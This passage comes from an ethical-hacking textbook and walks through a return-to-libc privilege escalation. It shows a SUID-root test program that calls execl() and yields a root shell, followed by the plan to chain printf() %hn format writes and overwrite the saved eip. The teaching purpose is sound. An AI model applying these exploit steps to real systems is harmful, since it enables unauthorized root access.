The execl() function contains
a NULL value as the last argument. We will deal with that in a moment.
First, let??™s test the execl() function call with a simple test program and ensure it does
not drop privileges when run as root.
BT book $ cat test_execl.c
int main(){
execl("./wrapper", "./wrapper", 0);
}
Compile and make SUID like the vulnerable program vuln2.c:
BT book $ gcc -o test_execl test_execl.c
BT book $ su
Password: ****
BT book # chown root.root test_execl
BT book # chmod +s test_execl
BT book # ls -l test_execl
-rwsr-sr-x 1 root root 8039 Dec 20 00:59 test_execl*
BT book # exit
exit
Run it to test the functionality.
BT book $ ./test_execl
sh-3.1# id
uid=0(root) gid=0(root) groups=100(users)
sh-3.1# exit
exit
BT book $
Great, we now have a way to keep the root privileges. Now all we need is a way to produce
a NULL byte on the stack. There are several ways to do this; however, for illustrative
purposes, we will use the printf() function as a wrapper around the execl() function.
Recall that the %hn format token can be used to write into memory locations. To make
this happen, we need to chain more than one libc function call together as shown:
Gray Hat Hacking: The Ethical Hacker??™s Handbook
190
Just like before, we will overwrite the old saved eip with the address of the glibc printf()
function.
Pages:
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374